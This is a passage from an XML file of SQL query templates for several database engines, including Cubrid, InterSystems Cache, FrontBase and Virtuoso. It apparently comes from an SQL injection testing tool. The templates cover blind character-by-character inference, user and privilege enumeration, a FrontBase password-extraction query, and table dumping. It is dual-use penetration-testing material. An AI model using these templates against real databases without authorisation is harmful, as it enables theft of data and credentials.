WHERE c.relname='%s'\"/>-->\n        <table_comment query=\"SELECT description FROM pg_description JOIN pg_class ON pg_description.objoid=pg_class.oid JOIN pg_namespace ON pg_class.relnamespace=pg_namespace.oid WHERE nspname='%s' AND relname='%s'\"/>\n        <column_comment/>\n        <is_dba query=\"(SELECT superuser=true FROM sys.users WHERE name=CURRENT_USER)\"/>\n        <check_udf/>\n        <users>\n            <inband query=\"SELECT name FROM sys.users\"/>\n            <blind query=\"SELECT name FROM sys.users LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(name) FROM sys.users\"/>\n        </users>\n        <passwords/>\n        <privileges>\n            <inband query=\"SELECT grantee,type FROM sys.privileges\" condition=\"grantee\"/>\n            <blind query=\"SELECT DISTINCT(type) FROM sys.privileges WHERE grantee %s '%s' LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(DISTINCT(type)) FROM sys.privileges WHERE grantee %s '%s'\"/>\n        </privileges>\n        <roles/>\n        <statements>\n            <inband query=\"SELECT stmt FROM sys.jobs\"/>\n            <blind query=\"SELECT stmt FROM sys.jobs LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(stmt) FROM sys.jobs\"/>\n        </statements>\n        <dbs>\n            <inband query=\"SELECT schema_name FROM information_schema.schemata\"/>\n            <blind query=\"SELECT schema_name FROM information_schema.schemata ORDER BY schema_name LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(schema_name) FROM information_schema.schemata\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT table_schema,table_name FROM information_schema.tables\" condition=\"table_schema\"/>\n            <blind query=\"SELECT table_name FROM information_schema.tables WHERE table_schema='%s' LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT attname,typname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'\" condition=\"attname\"/>\n            <blind query=\"SELECT attname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'\" query2=\"SELECT typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s'\" count=\"SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'\" condition=\"attname\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n            <blind query=\"SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schema_name FROM information_schema.schemata WHERE %s\" condition=\"schema_name\"/>\n            <blind query=\"SELECT schema_name FROM information_schema.schemata WHERE %s\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM information_schema.schemata WHERE %s\" condition=\"schema_name\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT table_schema,table_name FROM information_schema.tables WHERE %s\" condition=\"table_name\" condition2=\"table_schema\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM information_schema.tables WHERE %s\" query2=\"SELECT table_name FROM information_schema.tables WHERE table_schema='%s'\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM information_schema.tables WHERE %s\" count2=\"SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'\" condition=\"table_name\" condition2=\"table_schema\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT nspname,relname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s\" condition=\"attname\" condition2=\"nspname\" condition3=\"relname\"/>\n            <blind query=\"SELECT DISTINCT(nspname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s\" query2=\"SELECT DISTINCT(relname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'\" count=\"SELECT COUNT(DISTINCT(nspname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s\" count2=\"SELECT COUNT(DISTINCT(relname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'\" condition=\"attname\" condition2=\"nspname\" condition3=\"relname\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"Cubrid\">\n        <cast query=\"CAST(%s AS VARCHAR(4000))\"/>\n        <length query=\"CHAR_LENGTH(%s)\"/>\n        <isnull query=\"IFNULL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"LIMIT %d,%d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s*\\,\\s*([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"/*\" query3=\"//\"/>\n        <substring query=\"MID((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <hex query=\"HEX(%s)\"/>\n        <inference query=\"ASCII(MID((%s),%d,1))>%d\"/>\n        <banner query=\"VERSION()\"/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db query=\"CURRENT_USER\"/>\n        <hostname/>\n        <table_comment query=\"SELECT comment FROM db_class WHERE owner_name='%s' AND class_name='%s'\"/>\n        <column_comment query=\"SELECT db_attribute.comment FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE owner_name='%s' AND db_class.class_name='%s' AND attr_name='%s'\"/>\n        <is_dba query=\"CURRENT_USER='DBA'\"/>\n        <check_udf query=\"(SELECT meth_name FROM db_method WHERE meth_name='%s' LIMIT 0,1)='%s'\"/>\n        <users>\n            <inband query=\"SELECT name FROM db_user\"/>\n            <blind query=\"SELECT name FROM db_user LIMIT %d,1\" count=\"SELECT COUNT(name) FROM db_user\"/>\n        </users>\n        <passwords/>\n        <privileges>\n            <inband query=\"SELECT grantee_name,auth_type FROM db_auth\" condition=\"grantee_name\"/>\n            <blind query=\"SELECT DISTINCT(auth_type) FROM db_auth WHERE grantee_name='%s' LIMIT %d,1\" count=\"SELECT COUNT(DISTINCT(auth_type)) FROM db_auth WHERE grantee_name='%s'\"/>\n        </privileges>\n        <roles/>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT owner_name FROM db_class\"/>\n            <blind query=\"SELECT DISTINCT(owner_name) FROM db_class LIMIT %d,1\" count=\"SELECT COUNT(DISTINCT(owner_name)) FROM db_class\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT owner_name,class_name FROM db_class\" condition=\"owner_name\"/>\n            <blind query=\"SELECT class_name FROM db_class WHERE owner_name='%s' LIMIT %d,1\" count=\"SELECT COUNT(class_name) FROM db_class WHERE owner_name='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT attr_name,data_type FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE db_class.class_name='%s' AND owner_name='%s'\" condition=\"attr_name\"/>\n            <blind query=\"SELECT attr_name FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE db_class.class_name='%s' AND owner_name='%s'\" query2=\"SELECT data_type FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE db_class.class_name='%s' AND owner_name='%s'\" count=\"SELECT COUNT(attr_name) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE db_class.class_name='%s' AND owner_name='%s'\" condition=\"attr_name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s\"/>\n            <blind query=\"SELECT %s FROM %s.%s LIMIT %d,1\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT name FROM db_user WHERE %s\" condition=\"name\"/>\n            <blind query=\"SELECT name FROM db_user WHERE %s\" count=\"SELECT COUNT(name) FROM db_user WHERE %s\" condition=\"name\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT owner_name,class_name FROM db_class WHERE %s\" condition=\"class_name\" condition2=\"owner_name\"/>\n            <blind query=\"SELECT DISTINCT(owner_name) FROM db_class WHERE %s\" query2=\"SELECT DISTINCT(class_name) FROM db_class WHERE owner_name='%s'\" count=\"SELECT COUNT(DISTINCT(owner_name)) FROM db_class WHERE %s\" count2=\"SELECT COUNT(DISTINCT(class_name)) FROM db_class WHERE owner_name='%s'\" condition=\"class_name\" condition2=\"owner_name\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT owner_name,db_class.class_name FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE %s\" condition=\"attr_name\" condition2=\"owner_name\" condition3=\"db_class.class_name\"/>\n            <blind query=\"SELECT DISTINCT(owner_name) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE %s\" query2=\"SELECT DISTINCT(db_class.class_name) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE owner_name='%s'\" count=\"SELECT COUNT(DISTINCT(owner_name)) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE %s\" count2=\"SELECT COUNT(DISTINCT(db_class.class_name)) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE owner_name='%s'\" condition=\"attr_name\" condition2=\"owner_name\" condition3=\"db_class.class_name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"InterSystems Cache\">\n        <cast query=\"CAST(%s AS NVARCHAR(4000))\"/>\n        <length query=\"CHAR_LENGTH(%s)\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"SELECT TOP %d %s FROM (%s) WHERE %%VID>%d\"/>\n        <limitregexp query=\"TOP\\s+(\\d+)\\s+.+?\\s+FROM\\s+.+?\\s+WHERE\\s+.+%%VID>(\\d+)\"/>\n        <limitgroupstart query=\"2\"/>\n        <limitgroupstop query=\"1\"/>\n        <limitstring/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\";\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <inference query=\"ASCII(SUBSTR((%s),%d,1))>%d\"/>\n        <banner query=\"$ZVERSION\"/>\n        <current_user query=\"$USERNAME\"/>\n        <current_db/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"$USERNAME='_SYSTEM'\"/>\n        <check_udf/>\n        <users/>\n        <passwords/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA\" query2=\"SELECT db FROM mysql.db\"/>\n            <blind query=\"SELECT TOP 1 schema_name FROM (SELECT TOP ALL schema_name FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY schema_name) WHERE %%VID=%d\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES\" condition=\"table_schema\"/>\n            <blind query=\"SELECT TOP 1 table_name FROM (SELECT TOP ALL table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' ORDER BY table_name) WHERE %%VID=%d\" count=\"SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n            <blind query=\"SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' ORDER BY column_name\" query2=\"SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'\" count=\"SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n            <blind query=\"SELECT TOP 1 %s FROM (SELECT TOP ALL * FROM %s.%s ORDER BY %s) WHERE %%VID=%d\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"schema_name\"/>\n            <blind query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" count=\"SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"schema_name\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s\" condition=\"table_name\" condition2=\"table_schema\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\" condition=\"table_name\" condition2=\"table_schema\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"eXtremeDB\">\n        <cast query=\"CAST(%s AS VARCHAR(4000))\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"IFNULL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"LIMIT %d,%d\"/>\n        <limitregexp query=\"\\s+LIMIT\\s+([\\d]+)\\s*\\,\\s*([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" LIMIT \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\"/>\n        <substring query=\"SUBSTR((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <inference query=\"SUBSTR((%s),%d,1)>'%c'\"/>\n        <banner/>\n        <current_user/>\n        <current_db/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba/>\n        <check_udf/>\n        <users/>\n        <passwords/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <dbs/>\n        <tables/>\n        <columns/>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <blind query=\"SELECT %s FROM %s LIMIT %d,1\" count=\"SELECT COUNT(*) FROM %s\"/>\n        </dump_table>\n        <search_db/>\n        <search_table/>\n        <search_column/>\n    </dbms>\n\n    <dbms value=\"FrontBase\">\n        <cast query=\"CAST(%s AS NCHAR VARYING(4000))\"/>\n        <length query=\"CHAR_LENGTH(%s)\"/>\n        <isnull query=\"COALESCE(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"TOP (%d,%d)\"/>\n        <limitregexp query=\"\\s+TOP\\s*\\(([\\d]+)\\s*\\,\\s*([\\d]+)\\)\" query2=\"\\s+TOP\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" TOP \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\";--\"/>\n        <substring query=\"SUBSTRING((%s) FROM %d FOR %d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)\"/>\n        <inference query=\"SUBSTRING((%s) FROM %d FOR 1)>'%c'\"/>\n        <banner/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db query=\"CURRENT_SCHEMA\"/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"(SELECT UPPER(CURRENT_USER) FROM INFORMATION_SCHEMA.IO_STATISTICS)='_SYSTEM'\"/>\n        <check_udf/>\n        <users>\n            <inband query=\"SELECT user_name FROM INFORMATION_SCHEMA.USERS\"/>\n            <blind query=\"SELECT TOP (%d,1) user_name FROM INFORMATION_SCHEMA.USERS\" count=\"SELECT COUNT(user_name) FROM INFORMATION_SCHEMA.USERS\"/>\n        </users>\n        <passwords>\n            <inband query=\"SELECT user_name,password FROM INFORMATION_SCHEMA.USERS\" condition=\"user_name\"/>\n            <blind query=\"SELECT TOP (%d,1) password FROM INFORMATION_SCHEMA.USERS WHERE user_name='%s'\" count=\"SELECT COUNT(password) FROM INFORMATION_SCHEMA.USERS WHERE user_name='%s'\"/>\n        </passwords>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <dbs>\n            <inband query=\"SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n            <blind query=\"SELECT TOP (%d,1) &quot;schema_name&quot; FROM INFORMATION_SCHEMA.SCHEMATA\" count=\"SELECT COUNT(&quot;schema_name&quot;) FROM INFORMATION_SCHEMA.SCHEMATA\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT &quot;schema_name&quot;,&quot;table_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk\" condition=\"&quot;schema_name&quot;\"/>\n            <blind query=\"SELECT TOP (%d,1) &quot;table_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE &quot;schema_name&quot;='%s'\" count=\"SELECT COUNT(&quot;table_name&quot;) FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE &quot;schema_name&quot;='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT &quot;column_name&quot;,data_type FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.DATA_TYPE_DESCRIPTOR,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.DATA_TYPE_DESCRIPTOR.column_name_pk=INFORMATION_SCHEMA.COLUMNS.column_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;table_name&quot;='%s' AND &quot;schema_name&quot;='%s'\" condition=\"&quot;column_name&quot;\"/>\n            <blind query=\"SELECT &quot;column_name&quot; FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;table_name&quot;='%s' AND &quot;schema_name&quot;='%s'\" query2=\"SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.DATA_TYPE_DESCRIPTOR,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.DATA_TYPE_DESCRIPTOR.column_name_pk=INFORMATION_SCHEMA.COLUMNS.column_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;table_name&quot;='%s' AND &quot;column_name&quot;='%s' AND &quot;schema_name&quot;='%s'\" count=\"SELECT COUNT(&quot;column_name&quot;) FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;table_name&quot;='%s' AND &quot;schema_name&quot;='%s'\" condition=\"&quot;column_name&quot;\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s\"/>\n            <blind query=\"SELECT TOP (%d,1) %s FROM %s.%s\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"&quot;schema_name&quot;\"/>\n            <blind query=\"SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" count=\"SELECT COUNT(&quot;schema_name&quot;) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" condition=\"&quot;schema_name&quot;\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT &quot;schema_name&quot;,&quot;table_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE %s\" condition=\"&quot;table_name&quot;\" condition2=\"&quot;schema_name&quot;\"/>\n            <blind query=\"SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE %s\" query2=\"SELECT &quot;table_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE &quot;schema_name&quot;='%s'\" count=\"SELECT COUNT(&quot;schema_name&quot;) FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE %s\" count2=\"SELECT COUNT(&quot;table_name&quot;) FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE &quot;schema_name&quot;='%s'\" condition=\"&quot;table_name&quot;\" condition2=\"&quot;schema_name&quot;\"/>\n        </search_table>\n        <!-- NOTE: Not working properly with DISTINCT(...) in subquery -->\n        <search_column>\n            <inband query=\"SELECT &quot;schema_name&quot;,&quot;table_name&quot; FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND %s\" condition=\"&quot;column_name&quot;\" condition2=\"&quot;schema_name&quot;\" condition3=\"&quot;table_name&quot;\"/>\n            <blind query=\"SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND %s\" query2=\"SELECT &quot;table_name&quot; FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;schema_name&quot;='%s'\" count=\"SELECT COUNT(&quot;schema_name&quot;) FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND %s\" count2=\"SELECT COUNT(&quot;table_name&quot;) FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;schema_name&quot;='%s'\" condition=\"&quot;column_name&quot;\" condition2=\"&quot;schema_name&quot;\" condition3=\"&quot;table_name&quot;\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"Raima Database Manager\">\n        <cast query=\"CONVERT(%s,CHAR)\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"IFNULL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit/>\n        <limitregexp/>\n        <limitgroupstart/>\n        <limitgroupstop/>\n        <limitstring/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"/*\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (IF(%s,1,0))\"/>\n        <inference query=\"UNICODE(SUBSTRING((%s),%d,1))>%d\"/>\n        <banner/>\n        <current_user/>\n        <current_db/>\n        <hostname/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba/>\n        <dbs/>\n        <tables/>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s\"/>\n            <!-- NOTE: Raima does not like escaping of LIKE strings (e.g. ...LIKE CHAR(32)) -->\n            <blind query=\"SELECT MIN(%s) FROM %s WHERE CONVERT(%s,CHAR)>'%s'\" query2=\"SELECT MAX(%s) FROM %s WHERE CONVERT(%s,CHAR) LIKE [SINGLE_QUOTE]%s[SINGLE_QUOTE]\" count=\"SELECT COUNT(*) FROM %s\" count2=\"SELECT COUNT(DISTINCT(%s)) FROM %s\"/>\n        </dump_table>\n        <users/>\n        <privileges/>\n        <roles/>\n        <statements/>\n        <search_db/>\n        <search_table/>\n        <search_column/>\n   </dbms>\n\n    <dbms value=\"Virtuoso\">\n        <cast query=\"CAST(%s AS NCHAR)\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"__MAX_NOTNULL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"TOP (%d,%d)\"/>\n        <limitregexp query=\"\\s+TOP\\s*\\(([\\d]+)\\s*\\,\\s*([\\d]+)\\)\" query2=\"\\s+TOP\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" TOP \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"-- -\" query2=\"/*\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <inference query=\"ASCII(SUBSTRING((%s),%d,1))>%d\"/>\n        <banner query=\"sys_stat('st_dbms_name')||' - '||sys_stat('st_dbms_ver')\"/>\n        <current_user query=\"USERNAME()\"/>\n        <current_db query=\"UPPER(USERNAME())\"/>\n        <hostname query=\"sys_stat('st_host_name')\"/>\n        <table_comment/>\n        <column_comment/>\n        <is_dba query=\"USERNAME()='dba'\"/>\n        <dbs>\n            <inband query=\"SELECT schema_name FROM 